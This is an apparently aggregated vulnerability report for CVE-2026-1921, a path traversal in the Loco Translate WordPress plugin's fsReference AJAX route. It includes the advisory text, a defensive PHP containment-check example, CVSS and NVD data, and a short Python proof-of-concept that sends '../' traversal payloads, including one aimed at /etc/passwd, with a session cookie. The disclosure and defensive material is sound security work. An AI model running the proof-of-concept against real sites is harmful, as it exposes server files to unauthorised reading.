Security Vulnerability Report
CVE-2026-1921 CVSS 4.9 MEDIUM

Published: 2026-05-05 03:15:59
Last Modified: 2026-05-05 19:09:32

Description

The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded.
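
The root cause described above is a normalize-then-use pattern: the `../` segments in `ref` are collapsed, but the resolved path is never checked against the directory it is supposed to stay inside, and a denylist of one filename (wp-config.php) does nothing to stop reads of any other file with an allowed extension. The following is an added example, not Loco Translate's code and not the fix shipped in 2.8.3 (the page links the changeset but does not show its contents). It shows the containment check a handler like the described `findSourceFile()` needs: resolve the candidate with `realpath()`, then require the result to start with the base directory plus a separator, and only then apply the extension allow-list. The function name `resolve_ref_within_base`, the base-directory argument, the extension list and the temporary-directory layout used for the demonstration are assumptions.

```php
<?php
// Added example, not Loco Translate's code: a containment check for a
// user-supplied relative reference (the advisory calls it `ref`) before
// any file read. Function name, base directory and extension list are assumed.

function resolve_ref_within_base(string $base, string $ref, array $allowedExt = ['php', 'js', 'json', 'twig']): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || !is_dir($baseReal)) {
        return null;
    }
    // Refuse NUL bytes and absolute paths (POSIX, Windows drive, UNC) before touching the filesystem.
    if ($ref === '' || strpos($ref, "\0") !== false || preg_match('#^([/\\\\]|[A-Za-z]:)#', $ref)) {
        return null;
    }
    // realpath() collapses "." and ".." and resolves symlinks, so the result is the
    // path that would actually be opened. It returns false for a missing target,
    // which is also treated as a rejection.
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $ref);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // The resolved path must start with the base directory plus a separator;
    // comparing without the separator would accept a sibling such as
    // "/srv/wp-content-old" when the base is "/srv/wp-content".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Extension allow-list, applied to the resolved name, not the raw input.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    return $candidate;
}

// Self-contained demonstration in a temporary directory (constructed sample layout).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ref-demo-' . bin2hex(random_bytes(4));
$base = $root . DIRECTORY_SEPARATOR . 'bundle';
mkdir($base . DIRECTORY_SEPARATOR . 'sub', 0700, true);
file_put_contents($base . DIRECTORY_SEPARATOR . 'template.twig', "{{ hello }}\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'outside.php', "<?php // outside the bundle\n");

$cases = [
    'template.twig',            // inside, allowed extension -> accepted
    'sub/../template.twig',     // normalises to the same file -> accepted
    '../outside.php',           // escapes the base -> rejected
    '../../../../etc/passwd',   // escapes the base and wrong extension -> rejected
    'missing.json',             // does not exist -> rejected
];
foreach ($cases as $ref) {
    $resolved = resolve_ref_within_base($base, $ref);
    printf("%-26s => %s\n", $ref, $resolved === null ? 'REJECTED' : 'OK ' . $resolved);
}

// Remove the constructed files.
unlink($base . DIRECTORY_SEPARATOR . 'template.twig');
unlink($root . DIRECTORY_SEPARATOR . 'outside.php');
rmdir($base . DIRECTORY_SEPARATOR . 'sub');
rmdir($base);
rmdir($root);
```

Run it with `php` from the command line; the two in-bundle references print `OK` with their resolved path and the other three print `REJECTED`. The check is done on the resolved path rather than on the raw string, which is what defeats `../` sequences, encoded variants and symlinks alike. One consequence worth knowing when deploying such a check: a symlink inside the base that points outside it is rejected too, so an installation that relies on symlinked plugin or theme directories has to pass the real target directory as the base.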

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Loco Translate <= 2.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-1921 PoC Example
# Target must have Loco Translate plugin installed and a user with Translator privileges.
target_url = "http://example.com/wp-admin/admin-ajax.php"
session_cookie = "wordpress_logged_in_xxxxxxxxxxxxxxxxx"  # Replace with valid authenticated session cookie

# The vulnerability allows reading .php, .js, .json, .twig files using directory traversal
# Example payload to read a file outside the intended directory
payload_data = {
    "action": "loco_json",
    "route": "fsReference",
    # Attempting to read wp-config.php is blocked, but other PHP files are accessible
    "ref": "../../../../../../etc/passwd"  # This might fail based on extension check
}

# Valid payload for a PHP file (e.g., reading another plugin's file)
payload_data_valid = {
    "action": "loco_json",
    "route": "fsReference",
    "ref": "../../../../../../path/to/another/plugin/file.php"
}

headers = {
    "Cookie": f"wordpress_logged_in_...={session_cookie}",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(target_url, data=payload_data_valid, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response content for file data.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12
https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92
https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12
https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92
https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php
https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2&new_path=%2Floco-translate/tags/2.8.3
https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1921", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:15:59.100", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2&new_path=%2Floco-translate/tags/2.8.3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve", "source": "[email protected]"}]}}